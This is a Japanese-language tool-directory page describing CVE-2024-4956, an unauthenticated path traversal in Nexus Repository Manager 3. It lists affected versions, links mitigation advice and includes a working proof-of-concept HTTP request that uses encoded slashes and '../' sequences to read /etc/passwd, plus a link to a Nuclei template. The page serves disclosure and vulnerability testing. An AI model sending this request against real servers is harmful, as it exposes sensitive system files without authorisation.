Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-4956 — Nexus Repository 3における認証なしのパストラバーサル | Kitploit
ツール/GitHubGitHub/erickfernandox/cve-2024-4956
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHuberickfernandox/cve-2024-4956

CVE-2024-4956

Nexus Repository 3における認証なしのパストラバーサル

リポジトリを見る
32年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-4956 - Nexus Repository Manager 3 における認証なしのパストラバーサル

Nexus Repository Manager は、開発に必要なアーティファクトを整理、保存、配布するリポジトリマネージャです。

Nexus Repository 3 の 3.68.1 より前のバージョンで、パストラバーサル脆弱性が発見されました。この脆弱性により、攻撃者は認証なしで、Nexus Repository アプリケーションのスコープ外のシステムファイルをダウンロードする URL を作成できます。これにより、機密性の高いシステムファイルが露出し、Nexus Repository がインストールされている環境のセキュリティが侵害される可能性があるため、重大なリスクをもたらします。

この脆弱性を軽減するために、できるだけ早く Nexus Repository をバージョン 3.68.1 以降に更新することを推奨します。

脆弱性の詳細および技術情報については、以下のリンクを参照してください。

References:

  • https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16

脆弱なバージョン

この脆弱性は、Sonatype Nexus Repository Manager のバージョン 3.0 から 3.68.0 に影響します。

緩和策:

Nexus Repository のアップグレードが、この脆弱性を排除するための推奨される方法です。ただし、すぐにアップグレードできないデプロイメント向けに、即時緩和オプションが利用可能です。

References:

  • https://support.sonatype.com/hc/en-us/articles/29412417068819

PoC

root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

上記の PoC により、/etc/passwd ファイルがアクセスされていることが確認できます:

Nuclei Template

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml

ツールをダウンロード